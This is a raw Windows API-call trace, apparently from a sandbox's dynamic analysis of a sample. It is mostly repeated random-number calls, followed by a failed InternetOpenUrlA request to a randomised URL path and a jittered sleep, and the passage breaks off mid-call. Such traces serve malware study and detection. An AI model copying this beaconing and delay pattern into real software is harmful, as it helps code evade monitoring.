BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a024b4, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a024b4) returned 0x0 [0257.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0257.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0257.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a024cc, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a024cc) returned 0x0 [0257.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0257.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0257.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0257.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.020] GetProcessHeap () returned 0x440000 [0258.020] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0258.020] lstrcpyA (in: lpString1=0x472900, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0258.020] lstrcatA (in: lpString1="\x04", lpString2="/fegov2cmyzLkeI5l9tfcw/tpQktXsdlJ9r9nqocRBrFtavyjtl25c4/wskhijayWp3u9fClyJoxF6pVoEf6pH4mpI2g07n5qbT/fewky1jpeb0dpuLmVxQApx2/rdl7161ttdBughvvuxntZd9evjyT2skVffUkfpx9pvObal/" | out: lpString1="\x04/fegov2cmyzLkeI5l9tfcw/tpQktXsdlJ9r9nqocRBrFtavyjtl25c4/wskhijayWp3u9fClyJoxF6pVoEf6pH4mpI2g07n5qbT/fewky1jpeb0dpuLmVxQApx2/rdl7161ttdBughvvuxntZd9evjyT2skVffUkfpx9pvObal/") returned="\x04/fegov2cmyzLkeI5l9tfcw/tpQktXsdlJ9r9nqocRBrFtavyjtl25c4/wskhijayWp3u9fClyJoxF6pVoEf6pH4mpI2g07n5qbT/fewky1jpeb0dpuLmVxQApx2/rdl7161ttdBughvvuxntZd9evjyT2skVffUkfpx9pvObal/" [0258.020] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0258.020] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/fegov2cmyzLkeI5l9tfcw/tpQktXsdlJ9r9nqocRBrFtavyjtl25c4/wskhijayWp3u9fClyJoxF6pVoEf6pH4mpI2g07n5qbT/fewky1jpeb0dpuLmVxQApx2/rdl7161ttdBughvvuxntZd9evjyT2skVffUkfpx9pvObal/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0258.020] GetProcessHeap () returned 0x440000 [0258.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0258.021] GetProcessHeap () returned 0x440000 [0258.021] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02450 | out: hHeap=0x440000) returned 1 [0258.021] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0258.021] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0258.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0258.022] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0258.022] Sleep (dwMilliseconds=0x14c82) [0258.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0258.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.143] GetProcessHeap () returned 0x440000 [0258.143] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f4e30 [0258.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f4e31, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4f4e31) returned 0x0 [0258.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.150] GetProcAddress (hModule=0x7ffc5bcc0000, 